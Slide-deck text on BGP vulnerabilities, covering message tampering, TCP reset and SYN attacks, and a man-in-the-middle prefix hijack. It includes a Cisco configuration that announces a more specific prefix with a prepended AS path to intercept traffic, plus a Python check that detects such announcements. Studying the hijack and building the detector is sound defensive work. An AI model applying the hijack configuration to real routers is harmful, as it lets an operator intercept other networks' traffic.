BGP Vulnerability
COMMUNICATION
Analog communication
Digital communication
Analog communication to digital communication convergence
Internet Protocol
FUTURE COMMUNICATION
IP based communication will become the core communication?
Scalability and reliability communication infrastructure?
Vulnerability and security threat?
CORE COMMUNICATION
Access Control List?
Default password issue?
Weak password?
Unencrypted remote login?
Routing protocol vulnerability?
We will focus on Border Gateway Protocol (BGP) now
BGP VULNERABILITY
BGP messages
TCP vulnerability
BGP internet man in the middle
Documented in RFC 4272
BGP MESSAGES
BGP states: idle, connect, active, opensent, openconfirm, established
BGP messages: open, update, notification, keepalive
BGP message modification to poison routing table and Denial of Service
Complex and nearly impractical
TCP VULNERABILITY
BGP and TCP port 179
Spoofed TCP RST/FIN?
TCP port flooding (SYN)
TCP session ends = BGP idle
BGP MAN IN THE MIDDLE
More specific network prefix wins
Use traceroute to identify routing from source to destination
Use route-map and AS-PATH prepending
Static routing to give information about next-hop-router
router bgp 100
 network 10.10.220.0 mask 255.255.255.0
 neighbor 2.2.4.2 remote-as 40
 neighbor 2.2.4.2 prefix-list JACKED out
 neighbor 2.2.4.2 route-map HIJACK out
 neighbor 4.3.2.1 remote-as 10
 neighbor 4.3.2.1 prefix-list ANN out
 neighbor 5.4.3.1 remote-as 60
 neighbor 5.4.3.1 prefix-list JACKED out
 neighbor 5.4.3.1 route-map HIJACK out
!
ip route 10.10.220.0 255.255.255.0 4.3.2.1
!
ip prefix-list ANN seq 10 permit 2.2.4.0/24
ip prefix-list ANN seq 15 permit 4.3.2.0/24
ip prefix-list ANN seq 20 permit 5.4.3.0/24
!
ip prefix-list JACKED seq 10 permit 2.2.4.0/24
ip prefix-list JACKED seq 15 permit 4.3.2.0/24
ip prefix-list JACKED seq 20 permit 5.4.3.0/24
ip prefix-list JACKED seq 25 permit 10.10.220.0/24
route-map HIJACK permit 10
 set as-path prepend 10 20 200
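Added example, not from the original slides: a monitoring check that flags the announcement the configuration above produces. Because the prepend makes the AS path end in 200, an origin-only check passes it; the check has to catch the more specific prefix. The covering 10.10.0.0/16, AS 200 as the legitimate origin, and all sample updates are constructed assumptions.

```python
import ipaddress

# Constructed monitoring table: (covering prefix, expected origin AS, longest
# prefix length we ever announce). The /16 and AS 200 are assumptions.
MONITORED = [(ipaddress.ip_network("10.10.0.0/16"), 200, 16)]

# Constructed observations: (prefix, AS_PATH as seen by a collector).
# The last AS in the path is the apparent origin.
UPDATES = [
    ("10.10.0.0/16", [40, 20, 200]),             # legitimate covering route
    ("10.10.220.0/24", [40, 100, 10, 20, 200]),  # AS 100 with prepend 10 20 200
    ("10.10.0.0/16", [60, 100]),                 # same prefix, wrong origin
    ("192.0.2.0/24", [40, 300]),                 # not one of our prefixes
]


def classify(prefix, as_path):
    """Return (verdict, detail) for one announcement against MONITORED."""
    net = ipaddress.ip_network(prefix)
    for covering, origin, max_len in MONITORED:
        if net.version != covering.version or not net.subnet_of(covering):
            continue
        if net.prefixlen > max_len:
            # Longest-prefix match makes this route win wherever it is accepted,
            # even though the prepended path shows the expected origin AS.
            return "more-specific", f"{net} inside {covering}, path {as_path}"
        if as_path[-1] != origin:
            return "origin-mismatch", f"{net} from AS{as_path[-1]}, expected AS{origin}"
        return "ok", str(net)
    return "unmonitored", str(net)


def alerts(updates):
    """Keep only the announcements that need operator attention."""
    found = []
    for prefix, path in updates:
        verdict, detail = classify(prefix, path)
        if verdict in ("more-specific", "origin-mismatch"):
            found.append((verdict, detail))
    return found


if __name__ == "__main__":
    for verdict, detail in alerts(UPDATES):
        print(f"{verdict}: {detail}")
```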
SOME POLICIES
Design and topology?
Access Control List implementation?
Complex password
Encrypted connection (SSH & HTTPS)